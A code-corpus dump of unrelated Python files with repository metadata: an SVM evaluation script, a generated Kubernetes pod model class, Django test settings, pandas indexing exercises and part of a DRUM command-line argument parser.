        print('\n', confusion, file=f)

    # Per-class precision/recall/F1 report.
    class_report = classification_report(y_test, clf_predicted, target_names=['0', '1'])
    print(class_report)
    with open(report_path, 'a+') as f:
        print('\n', class_report, file=f)

    # Linear-kernel coefficients act as feature importances.
    # NOTE(review): one-hot encoding expands each categorical column into
    # several coefficients, so len(coef_) may exceed len(feature_names);
    # zip() silently truncates the pairing — confirm this mapping is intended.
    feature_names = numeric_features + categorical_features
    coef_dict = {feat: coef
                 for coef, feat in zip(clf.steps[2][1].coef_[0, :], feature_names)}
    # Sort features by coefficient value (ascending).
    coef_dict = dict(sorted(coef_dict.items(), key=lambda item: item[1]))
    feature_importance = pd.Series(list(coef_dict.values()), index=coef_dict.keys())
    with open(report_dir + '/feature_importance.txt', 'w') as f:
        with pd.option_context('display.max_rows', None, 'display.max_columns', None):
            print(feature_importance, file=f)

    # Plot feature importance
    feature_importance.plot.barh(figsize=(15, 25))
    plt.show()
if __name__ == '__main__':
    # Load the engineered dataset (LIWC + metadata + POS counts + 15 LDA topics)
    # and run the SVM training/evaluation pipeline on it.
    df = pd.read_csv(r'..\..\data\processed\motivation_liwc_meta_pos_topic_n15.csv')
    svm_numeric(df)
| 46.216049 | 119 | 0.59423 |
501015b220df0ca6cbc83ab68ce433831afa7599 | 7,123 | py | Python | kubernetes/client/models/v1_pod.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_pod.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_pod.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1Pod(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """

    def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
        """
        V1Pod - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
        and the value is attribute type.
        :param dict attributeMap: The key is attribute name
        and the value is json key in definition.
        """
        # Attribute name -> Swagger type; consumed by to_dict() and the
        # generated (de)serialization machinery.
        self.swagger_types = {
            'api_version': 'str',
            'kind': 'str',
            'metadata': 'V1ObjectMeta',
            'spec': 'V1PodSpec',
            'status': 'V1PodStatus'
        }

        # Python attribute name -> JSON key in the API definition.
        self.attribute_map = {
            'api_version': 'apiVersion',
            'kind': 'kind',
            'metadata': 'metadata',
            'spec': 'spec',
            'status': 'status'
        }

        self._api_version = api_version
        self._kind = kind
        self._metadata = metadata
        self._spec = spec
        self._status = status

    @property
    def api_version(self):
        """
        Gets the api_version of this V1Pod.
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources

        :return: The api_version of this V1Pod.
        :rtype: str
        """
        return self._api_version

    @api_version.setter
    def api_version(self, api_version):
        """
        Sets the api_version of this V1Pod.
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources

        :param api_version: The api_version of this V1Pod.
        :type: str
        """
        self._api_version = api_version

    @property
    def kind(self):
        """
        Gets the kind of this V1Pod.
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds

        :return: The kind of this V1Pod.
        :rtype: str
        """
        return self._kind

    @kind.setter
    def kind(self, kind):
        """
        Sets the kind of this V1Pod.
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds

        :param kind: The kind of this V1Pod.
        :type: str
        """
        self._kind = kind

    @property
    def metadata(self):
        """
        Gets the metadata of this V1Pod.
        Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata

        :return: The metadata of this V1Pod.
        :rtype: V1ObjectMeta
        """
        return self._metadata

    @metadata.setter
    def metadata(self, metadata):
        """
        Sets the metadata of this V1Pod.
        Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata

        :param metadata: The metadata of this V1Pod.
        :type: V1ObjectMeta
        """
        self._metadata = metadata

    @property
    def spec(self):
        """
        Gets the spec of this V1Pod.
        Specification of the desired behavior of the pod. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status

        :return: The spec of this V1Pod.
        :rtype: V1PodSpec
        """
        return self._spec

    @spec.setter
    def spec(self, spec):
        """
        Sets the spec of this V1Pod.
        Specification of the desired behavior of the pod. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status

        :param spec: The spec of this V1Pod.
        :type: V1PodSpec
        """
        self._spec = spec

    @property
    def status(self):
        """
        Gets the status of this V1Pod.
        Most recently observed status of the pod. This data may not be up to date. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status

        :return: The status of this V1Pod.
        :rtype: V1PodStatus
        """
        return self._status

    @status.setter
    def status(self, status):
        """
        Sets the status of this V1Pod.
        Most recently observed status of the pod. This data may not be up to date. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status

        :param status: The status of this V1Pod.
        :type: V1PodStatus
        """
        self._status = status

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        # Recursively serialize lists, nested models and dicts of models;
        # anything without a to_dict() is passed through unchanged.
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, V1Pod):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
fc2314548f4242789ede650a0fea27dbacac7377 | 1,753 | py | Python | config/settings/test.py | badri/openshift-demo | 261240727df6363507511b1d3f9706943e463bf7 | [
"MIT"
] | null | null | null | config/settings/test.py | badri/openshift-demo | 261240727df6363507511b1d3f9706943e463bf7 | [
"MIT"
] | null | null | null | config/settings/test.py | badri/openshift-demo | 261240727df6363507511b1d3f9706943e463bf7 | [
"MIT"
] | null | null | null | """
With these settings, tests run faster.
"""
from .base import * # noqa
from .base import env

# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# A fixed fallback key is acceptable here because this module is only
# ever used for running the test suite.
SECRET_KEY = env(
    "DJANGO_SECRET_KEY",
    default="B33p6H4q8iHkLunpTvYGqJsFkFtDawugvWAcKS61Ekzpmldbj4VvD0BQ2HaGdt8W",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#test-runner
TEST_RUNNER = "django.test.runner.DiscoverRunner"

# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
# In-memory cache: fast and isolated per test process.
CACHES = {
    "default": {
        "BACKEND": "django.core.cache.backends.locmem.LocMemCache",
        "LOCATION": "",
    }
}

# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
# MD5 is insecure but fast; it speeds up tests that create users.
PASSWORD_HASHERS = ["django.contrib.auth.hashers.MD5PasswordHasher"]

# TEMPLATES
# ------------------------------------------------------------------------------
# Cached template loader avoids re-reading templates from disk on every render.
TEMPLATES[0]["OPTIONS"]["loaders"] = [  # noqa F405
    (
        "django.template.loaders.cached.Loader",
        [
            "django.template.loaders.filesystem.Loader",
            "django.template.loaders.app_directories.Loader",
        ],
    )
]

# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# Store outgoing mail in memory so tests can inspect it without sending.
EMAIL_BACKEND = "django.core.mail.backends.locmem.EmailBackend"

# Your stuff...
| 32.462963 | 80 | 0.50656 |
ce803ba0760ec17422556dbfafd6254aadbdf5a5 | 4,319 | py | Python | indexing_filtering.py | Nishant-Mishra/python-pandas-fundamentals | e10c979d9e684a5fb1a54fa7430266052e8388f2 | [
"MIT"
] | null | null | null | indexing_filtering.py | Nishant-Mishra/python-pandas-fundamentals | e10c979d9e684a5fb1a54fa7430266052e8388f2 | [
"MIT"
] | null | null | null | indexing_filtering.py | Nishant-Mishra/python-pandas-fundamentals | e10c979d9e684a5fb1a54fa7430266052e8388f2 | [
"MIT"
] | null | null | null | """
Using the previous dataset, we will try to answer following questions:
1. Number of distinct artists
2. How many artworks by 'Robert Blake'
3. Artwork with biggest area
----
4. Oldest Acquired Artwork
5. Total number of artworks created using Acrylic or Oil paints.
6. Total artworks acquired on any given year
7. Number of Artworks with unknown titles
While doing this, we will learn indexing and filtering tools available in Pandas
"""
import pandas as pd
def read_tate_dataset() -> pd.DataFrame:
    """Load the pickled Tate artworks dataset from disk."""
    return pd.read_pickle('../datasets/tate_dataset_full_df.gz', compression='infer')
def task1(df: pd.DataFrame):
    """Report the number of distinct artists in the dataset."""
    print("Task 1: Read distinct artists count")
    # pd.unique keeps NaN as a distinct value, unlike Series.nunique().
    n_artists = len(pd.unique(df.loc[:, 'artist']))
    print(f"Value: {n_artists}")
def task2(df: pd.DataFrame):
    """Report how many artworks are attributed to Robert Blake."""
    print("Task 2: Number of artworks by 'Robert Blake'")
    blake_count = df['artist'].value_counts()['Blake, Robert']
    print(f"Value: {blake_count}")
def task3(df: pd.DataFrame):
    """Report the artwork whose width * height area is the largest."""
    print("Task 3: Artwork with largest area")
    # Non-numeric dimension values become NaN so they can never win the max.
    width = pd.to_numeric(df.loc[:, 'width'], errors='coerce')
    height = pd.to_numeric(df.loc[:, 'height'], errors='coerce')
    df = df.assign(area=width * height)
    areas = df.loc[:, 'area']
    print(f"Area: {areas.max()}\nArtwork:\n{df.loc[areas.idxmax(), :]}")
def task4(df: pd.DataFrame):
    """Report the earliest acquisition year and the corresponding artwork."""
    print("Task 4: Oldest Acquired Artwork")
    years = pd.to_numeric(df.loc[:, 'acquisitionYear'], errors='coerce')
    oldest = df.loc[years.idxmin(), :]
    print(f"Year: {int(years.min())}\nArtwork:\n{oldest}")
def task5(df: pd.DataFrame):
    """Count artworks created with Oil or Acrylic paints.

    Fix: when ``medium`` contains missing values, ``str.startswith``
    yields NaN in the boolean mask, which breaks boolean ``.loc``
    indexing. ``na=False`` treats missing mediums as non-matching.
    """
    print("Task 5: Total number of artworks created using Oil or Acrylic Paints")
    mediums = df.loc[:, 'medium']  # type: pd.Series
    # str accessor applies the string test element-wise; na=False keeps
    # the mask strictly boolean even for missing mediums.
    oil_paint_artworks = mediums.str.lower().str.startswith('oil', na=False)
    acrylic_paint_artworks = mediums.str.lower().str.startswith('acrylic', na=False)
    # Element-wise OR combines both masks.
    row_filter = oil_paint_artworks | acrylic_paint_artworks
    # Filter all oil and acrylic artworks.
    oil_or_acrylic_artworks = df.loc[row_filter, :]  # type: pd.DataFrame
    cnt_oil_or_acrylic_artworks = len(oil_or_acrylic_artworks)
    print(f"Value: {cnt_oil_or_acrylic_artworks}")
def task6(df: pd.DataFrame, year):
    """Report how many artworks were acquired in the given year."""
    print(f"Task 6: Total artworks acquired in the year {year}")
    acquired = pd.to_numeric(df.loc[:, 'acquisitionYear'], errors='coerce')
    matching = df.loc[acquired == year, :]
    print(f"Value: {len(matching)}")
def task7(df: pd.DataFrame):
    """Report an estimate of the number of artworks with unknown titles."""
    print("Task 7: Number of artworks with unknown titles")
    counts = df.loc[:, 'title'].value_counts().sort_values()
    # Manual inspection of the ten most frequent titles showed the top
    # five are placeholders (unknown titles); sum their occurrence counts.
    placeholder_counts = counts.tail(10).tail(5)
    print(f"Value: {placeholder_counts.sum()}")
if __name__ == '__main__':
    # Load the dataset once, then run the exercises in order.
    tate_dataset_df = read_tate_dataset()
    task1(tate_dataset_df)
    print()
    task2(tate_dataset_df)
    print()
    task3(tate_dataset_df)
    print()
    task4(tate_dataset_df)
    print()
    task5(tate_dataset_df)
    print()
    # Task 6 is interactive: ask which acquisition year to count.
    year = input("Enter Acquisition Year for which total artworks are needed: ")
    task6(tate_dataset_df, int(year))
    print()
    task7(tate_dataset_df)
    print()
| 33.48062 | 101 | 0.69831 |
6463ba3a24c9bf3655f50908360dd5bc6f1e6836 | 274 | py | Python | simple_one/pandas_play.py | rodonguyen/vres_code_2021 | cb49d941db4dfc5137e887b195f403fb4262cfd8 | [
"MIT"
] | null | null | null | simple_one/pandas_play.py | rodonguyen/vres_code_2021 | cb49d941db4dfc5137e887b195f403fb4262cfd8 | [
"MIT"
] | null | null | null | simple_one/pandas_play.py | rodonguyen/vres_code_2021 | cb49d941db4dfc5137e887b195f403fb4262cfd8 | [
"MIT"
] | null | null | null | import pandas as pd
# Demo frame: scalar broadcast ("A", "F"), a timestamp, a typed Series,
# and a categorical column (mirrors the pandas "10 minutes to pandas" intro).
df = pd.DataFrame({
    "A": 1.0,
    "B": pd.Timestamp("20130102"),
    "C": pd.Series(1, index=list(range(4)), dtype="float32"),
    "E": pd.Categorical(["test", "train", "test", "train"]),
    "F": "foo",
})
print(df.head(1)) | 24.909091 | 65 | 0.5 |
cc78c0333e369487410e5890b5db7ffab513a644 | 40,003 | py | Python | custom_model_runner/datarobot_drum/drum/args_parser.py | amperie/user-models | 5236c50d0f20a7bac81acc5d1936a3502de2f5f3 | [
"Apache-2.0"
] | null | null | null | custom_model_runner/datarobot_drum/drum/args_parser.py | amperie/user-models | 5236c50d0f20a7bac81acc5d1936a3502de2f5f3 | [
"Apache-2.0"
] | null | null | null | custom_model_runner/datarobot_drum/drum/args_parser.py | amperie/user-models | 5236c50d0f20a7bac81acc5d1936a3502de2f5f3 | [
"Apache-2.0"
] | null | null | null | import argparse
import os
from datarobot_drum.drum.push import PUSH_HELP_TEXT
import sys
import subprocess
from datarobot_drum.drum.description import version
from datarobot_drum.drum.common import (
LOG_LEVELS,
ArgumentsOptions,
RunLanguage,
TargetType,
ArgumentOptionsEnvVars,
)
class CMRunnerArgsRegistry(object):
SUBPARSER_DEST_KEYWORD = "subparser_name"
NEW_SUBPARSER_DEST_KEYWORD = "new_mode"
_parsers = {}
    @staticmethod
    def _tokenize_parser_prog(parser):
        """Split a parser's ``prog`` string into its command words."""
        # example:
        # - for score_parser prog is "drum score"
        # - for new_model_parser prog is "drum new model"
        return parser.prog.split(" ")
    @staticmethod
    def _reg_arg_version(*parsers):
        """Register --version, which prints "drum <version>" and exits."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.VERSION,
                action="version",
                version="%(prog)s {version}".format(version=version),
            )
    @staticmethod
    def _reg_arg_verbose(*parsers):
        """Register the --verbose flag on each parser."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.VERBOSE,
                action="store_true",
                default=False,
                help="Show verbose output",
            )
@staticmethod
def _is_valid_file(arg):
abs_path = os.path.abspath(arg)
if not os.path.exists(arg):
raise argparse.ArgumentTypeError("The file {} does not exist!".format(arg))
else:
return os.path.realpath(abs_path)
@staticmethod
def _is_valid_dir(arg):
abs_path = os.path.abspath(arg)
if not os.path.isdir(arg):
raise argparse.ArgumentTypeError("The path {} is not a directory!".format(arg))
else:
return os.path.realpath(abs_path)
@staticmethod
def _is_valid_output_dir(arg):
abs_path = os.path.abspath(arg)
if not os.path.isdir(arg):
raise argparse.ArgumentTypeError(
"The path {} is not a directory! For custom tasks, "
"the output directory will consist of the artifacts usable "
"for making predictions. ".format(arg)
)
else:
return os.path.realpath(abs_path)
    @staticmethod
    def _path_does_non_exist(arg):
        """argparse ``type`` callback: absolute path that must not exist yet."""
        if os.path.exists(arg):
            raise argparse.ArgumentTypeError(
                "The path {} already exists! Please provide a non existing path!".format(arg)
            )
        return os.path.abspath(arg)
    @staticmethod
    def _reg_arg_input(*parsers):
        """Register the required --input dataset path on each parser."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.INPUT,
                default=None,
                required=True,
                type=CMRunnerArgsRegistry._is_valid_file,
                help="Path to an input dataset",
            )
    @staticmethod
    def _reg_arg_output(*parsers):
        """Register --output; semantics depend on the subcommand (score vs fit)."""
        for parser in parsers:
            # parser.prog is e.g. "drum score"; element 1 is the subcommand.
            prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
            if prog_name_lst[1] == ArgumentsOptions.SCORE:
                help_message = "Path to a csv file to output predictions"
                type_callback = os.path.abspath
            elif prog_name_lst[1] == ArgumentsOptions.FIT:
                help_message = (
                    "DRUM will copy the contents of code_dir and create "
                    "the model artifact in the output folder"
                )
                type_callback = CMRunnerArgsRegistry._is_valid_output_dir
            else:
                # Guard against wiring this option into an unsupported subparser.
                raise ValueError(
                    "{} argument should be used only by score and fit parsers!".format(
                        ArgumentsOptions.OUTPUT
                    )
                )

            parser.add_argument(
                ArgumentsOptions.OUTPUT, default=None, type=type_callback, help=help_message
            )
    @staticmethod
    def _reg_arg_target_feature_and_filename(*parsers):
        """Register the mutually exclusive --target / --target-csv options."""
        for parser in parsers:
            group = parser.add_mutually_exclusive_group(required=False)
            group.add_argument(
                ArgumentsOptions.TARGET,
                type=str,
                required=False,
                help="Which column to use as the target. Argument is mutually exclusive with {}.".format(
                    ArgumentsOptions.TARGET_CSV
                ),
            )

            group.add_argument(
                ArgumentsOptions.TARGET_CSV,
                type=CMRunnerArgsRegistry._is_valid_file,
                required=False,
                help="A file containing the target values. Argument is mutually exclusive with {}.".format(
                    ArgumentsOptions.TARGET
                ),
            )
    @staticmethod
    def _reg_arg_weights(*parsers):
        """Register the mutually exclusive --row-weights / --row-weights-csv options."""
        for parser in parsers:
            group = parser.add_mutually_exclusive_group(required=False)
            group.add_argument(
                ArgumentsOptions.WEIGHTS,
                type=str,
                required=False,
                default=None,
                help="A column name of row weights in your training dataframe. "
                "Argument is mutually exclusive with {}".format(ArgumentsOptions.WEIGHTS_CSV),
            )
            group.add_argument(
                ArgumentsOptions.WEIGHTS_CSV,
                type=CMRunnerArgsRegistry._is_valid_file,
                required=False,
                default=None,
                help="A one column csv file to be parsed as row weights. "
                "Argument is mutually exclusive with {}".format(ArgumentsOptions.WEIGHTS),
            )
    @staticmethod
    def _reg_arg_skip_predict(*parsers):
        """Register the --skip-predict flag."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.SKIP_PREDICT,
                required=False,
                default=False,
                action="store_true",
                help="By default we will attempt to predict using your model, but we give you the"
                "option to turn this off",
            )
    @staticmethod
    def _reg_arg_pos_neg_labels(*parsers):
        """Register --positive-class-label / --negative-class-label.

        For binary classification both labels must be supplied together;
        the ``type`` callback inspects sys.argv to enforce that pairing.
        """
        def are_both_labels_present(arg):
            # argparse "type" callback: reject the value unless BOTH label
            # options appear on the command line.
            error_message = (
                "\nError - for binary classification case, "
                "both positive and negative class labels have to be provided. \n"
                "See --help option for more information"
            )
            labels = [ArgumentsOptions.POSITIVE_CLASS_LABEL, ArgumentsOptions.NEGATIVE_CLASS_LABEL]
            if not all([x in sys.argv for x in labels]):
                raise argparse.ArgumentTypeError(error_message)
            return str(arg)

        for parser in parsers:
            fit_intuit_message = ""
            prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
            # Only "drum fit" can infer labels from the dataset; extend help text.
            if prog_name_lst[1] == ArgumentsOptions.FIT:
                fit_intuit_message = "If you do not provide these labels, but your dataset is classification, DRUM will choose the labels for you."

            parser.add_argument(
                ArgumentsOptions.POSITIVE_CLASS_LABEL,
                default=None,
                type=are_both_labels_present,
                help="Positive class label for a binary classification case. The argument can also be provided by setting {} env var. ".format(
                    ArgumentOptionsEnvVars.POSITIVE_CLASS_LABEL
                )
                + fit_intuit_message,
            )
            parser.add_argument(
                ArgumentsOptions.NEGATIVE_CLASS_LABEL,
                default=None,
                type=are_both_labels_present,
                help="Negative class label for a binary classification case. The argument can also be provided by setting {} env var. ".format(
                    ArgumentOptionsEnvVars.NEGATIVE_CLASS_LABEL
                )
                + fit_intuit_message,
            )
    @staticmethod
    def _reg_arg_multiclass_labels(*parsers):
        """Register --class-labels / --class-labels-file (mutually exclusive)."""
        class RequiredLength(argparse.Action):
            # Custom action: reject fewer than MIN_LABELS label values.
            ERROR_MESSAGE = "Multiclass classification requires at least 2 labels."
            MIN_LABELS = 2

            def __call__(self, parser, namespace, values, option_string=None):
                if len(values) < self.MIN_LABELS:
                    raise argparse.ArgumentTypeError(self.ERROR_MESSAGE)
                setattr(namespace, self.dest, values)

        class ParseLabelsFile(argparse.Action):
            # Custom action: read newline-separated labels from a file and
            # store them under namespace.class_labels (same dest as the
            # inline --class-labels option).
            def __call__(self, parser, namespace, values, option_string=None):
                with open(values) as f:
                    labels = [label for label in f.read().split(os.linesep) if label]
                    if len(labels) < RequiredLength.MIN_LABELS:
                        raise argparse.ArgumentTypeError(RequiredLength.ERROR_MESSAGE)
                    setattr(namespace, "class_labels", labels)

        def are_labels_double_specified(arg):
            # argparse "type" callback: reject supplying both the inline list
            # and the labels file on the same command line.
            label_options = [ArgumentsOptions.CLASS_LABELS_FILE, ArgumentsOptions.CLASS_LABELS]
            if all(opt in sys.argv for opt in label_options):
                error_message = (
                    "\nError - for multiclass classification, either the class labels or "
                    "a class labels file should be provided, but not both.\n"
                    "See --help option for more information"
                )
                raise argparse.ArgumentTypeError(error_message)
            return arg

        for parser in parsers:
            fit_intuit_message = ""
            class_label_order_message = (
                "Labels should be in the order as "
                "the predicted probabilities produced by the model. "
            )
            prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
            # Only "drum fit" can infer labels from the dataset; extend help text.
            if prog_name_lst[1] == ArgumentsOptions.FIT:
                fit_intuit_message = (
                    "If you do not provide these labels, but your dataset is classification, "
                    "DRUM will choose the labels for you"
                )

            parser.add_argument(
                ArgumentsOptions.CLASS_LABELS,
                default=None,
                type=are_labels_double_specified,
                nargs="+",
                action=RequiredLength,
                help="The class labels for a multiclass classification case. The argument can also be provided by setting {} env var. ".format(
                    ArgumentOptionsEnvVars.CLASS_LABELS
                )
                + class_label_order_message
                + fit_intuit_message,
            )
            parser.add_argument(
                ArgumentsOptions.CLASS_LABELS_FILE,
                default=None,
                type=are_labels_double_specified,
                action=ParseLabelsFile,
                help="A file containing newline separated class labels for a multiclass classification case. The argument can also be provided by setting {} env var. ".format(
                    ArgumentOptionsEnvVars.CLASS_LABELS_FILE
                )
                + class_label_order_message
                + fit_intuit_message,
            )
    @staticmethod
    def _reg_arg_code_dir(*parsers):
        """Register -cd/--code-dir; for "drum new" the path must not exist yet."""
        for parser in parsers:
            prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
            if prog_name_lst[1] == ArgumentsOptions.NEW:
                help_message = "Directory to use for creating the new template"
                type_callback = CMRunnerArgsRegistry._path_does_non_exist
            else:
                help_message = "Custom model code dir"
                type_callback = CMRunnerArgsRegistry._is_valid_dir

            parser.add_argument(
                "-cd",
                ArgumentsOptions.CODE_DIR,
                default=None,
                required=True,
                type=type_callback,
                help=help_message,
            )
    @staticmethod
    def _reg_arg_address(*parsers):
        """Register the required --address host[:port] option."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.ADDRESS,
                default=None,
                required=True,
                help="Prediction server address host[:port]. Default Flask port is: 5000. The argument can also be provided by setting {} env var.".format(
                    ArgumentOptionsEnvVars.ADDRESS
                ),
            )
    @staticmethod
    def _reg_arg_logging_level(*parsers):
        """Register --logging-level with choices taken from LOG_LEVELS."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.LOGGING_LEVEL,
                required=False,
                choices=list(LOG_LEVELS.keys()),
                default="warning",
                help="Logging level to use",
            )
    @staticmethod
    def _reg_arg_docker(*parsers):
        """Register --docker (image name or a Dockerfile context directory)."""
        for parser in parsers:
            prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
            parser.add_argument(
                ArgumentsOptions.DOCKER,
                default=None,
                required=False,
                help="Docker image to use to run {} in the {} mode, "
                "or a directory, containing a Dockerfile, which can be built into a docker image. "
                "If code dir contains requirements.txt file, DRUM tries to install dependencies during image build. (Reflects the DR App behavior.) "
                "Requirements installation is supported for Python/R models only. "
                "Use {} to skip installation."
                "Note: DRUM attempts to install dependencies only if docker context folder is provided, not already built image from the registry.".format(
                    ArgumentsOptions.MAIN_COMMAND,
                    prog_name_lst[1],
                    ArgumentsOptions.SKIP_DEPS_INSTALL,
                ),
            )
@staticmethod
def _reg_arg_skip_deps_install(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.SKIP_DEPS_INSTALL,
default=False,
action="store_true",
required=False,
help="Skip dependencies installation during the image build. "
"If code dir contains requirements.txt file, DRUM tries to install dependencies during image build. (Reflects the DR App behavior.) "
"Provide this argument to skip dependencies installation.",
),
@staticmethod
def _reg_arg_memory(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.MEMORY,
default=None,
required=False,
help="Amount of memory to allow the docker container to consume. "
"The value will be passed to the docker run command to both the "
"--memory and --memory-swap parameters. b,k,m,g suffixes are supported",
),
    @staticmethod
    def _reg_arg_production_server(*parsers):
        """Register the --production flag (serve via uwsgi + nginx instead of dev Flask)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.PRODUCTION,
                action="store_true",
                default=False,
                help="Run prediction server in production mode uwsgi + nginx. The argument can also be provided by setting {} env var.".format(
                    ArgumentOptionsEnvVars.PRODUCTION
                ),
            )
    @staticmethod
    def _reg_arg_max_workers(*parsers):
        """Register the --max-workers option (uwsgi worker count; production mode only)."""
        def type_callback(arg):
            # argparse `type` hook: int(arg) may raise ValueError, which argparse
            # reports as an invalid value for this option.
            ret_val = int(arg)
            # NOTE(review): inspects sys.argv directly to enforce pairing with
            # --production; abbreviated or env-var-provided forms would not be
            # detected here -- fragile, confirm before relying on it.
            if ArgumentsOptions.PRODUCTION not in sys.argv:
                raise argparse.ArgumentTypeError(
                    "can only be used in pair with {}".format(ArgumentsOptions.PRODUCTION)
                )
            if ret_val <= 0:
                raise argparse.ArgumentTypeError("must be > 0")
            return ret_val
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.MAX_WORKERS,
                type=type_callback,
                # default 0 is mapped into null in pipeline json
                default=0,
                help="Max number of uwsgi workers in server production mode. The argument can also be provided by setting {} env var.".format(
                    ArgumentOptionsEnvVars.MAX_WORKERS
                ),
            )
    @staticmethod
    def _reg_arg_show_perf(*parsers):
        """Register the --show-perf flag (print performance stats)."""
        for parser in parsers:
            parser.add_argument(
                "--show-perf", action="store_true", default=False, help="Show performance stats"
            )
    @staticmethod
    def _reg_arg_samples(*parsers):
        """Register the -s/--samples option (perf-test sample count)."""
        for parser in parsers:
            parser.add_argument("-s", "--samples", type=int, default=None, help="Number of samples")
    @staticmethod
    def _reg_arg_iterations(*parsers):
        """Register the -i/--iterations option (perf-test iteration count)."""
        for parser in parsers:
            parser.add_argument(
                "-i", "--iterations", type=int, default=None, help="Number of iterations"
            )
    @staticmethod
    def _reg_arg_timeout(*parsers):
        """Register the --timeout option (per test case, seconds; default 600)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.TIMEOUT, type=int, default=600, help="Test case timeout"
            )
    @staticmethod
    def _reg_arg_in_server(*parsers):
        """Register the --in-server flag (report performance measured inside the server)."""
        for parser in parsers:
            parser.add_argument(
                "--in-server",
                action="store_true",
                default=False,
                help="Show performance inside server",
            )
    @staticmethod
    def _reg_arg_url(*parsers):
        """Register the --url option (target an already-running prediction server)."""
        for parser in parsers:
            parser.add_argument(
                "--url", default=None, help="Run performance against the given prediction server"
            )
@staticmethod
def _reg_arg_language(*parsers):
for parser in parsers:
langs = [e.value for e in RunLanguage]
prog_name_lst = CMRunnerArgsRegistry._tokenize_parser_prog(parser)
if prog_name_lst[1] == ArgumentsOptions.NEW:
langs.remove(RunLanguage.JAVA.value)
required_val = True
else:
required_val = False
parser.add_argument(
ArgumentsOptions.LANGUAGE,
choices=langs,
default=None,
required=required_val,
help="Language to use for the new model/env template to create",
)
@staticmethod
def _reg_arg_num_rows(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.NUM_ROWS,
default="ALL",
help="Number of rows to use for testing the fit functionality. "
"Set to ALL to use all rows. Default is 100",
)
@staticmethod
def _reg_arg_sparse_colfile(*parsers):
for parser in parsers:
parser.add_argument(
ArgumentsOptions.SPARSE_COLFILE,
default=None,
type=CMRunnerArgsRegistry._is_valid_file,
help="Drum ingests sparse data as .mtx files, which don't have support for column"
"names. We allow a second file which addresses this. Please do this by"
"specifying one column name per line in the file. The number of lines should "
"match the number of columns in your mtx file exactly. ",
)
    @staticmethod
    def _reg_arg_parameter_file(*parsers):
        """Register the --parameter-file option (JSON file of model parameters)."""
        for parser in parsers:
            parser.add_argument(
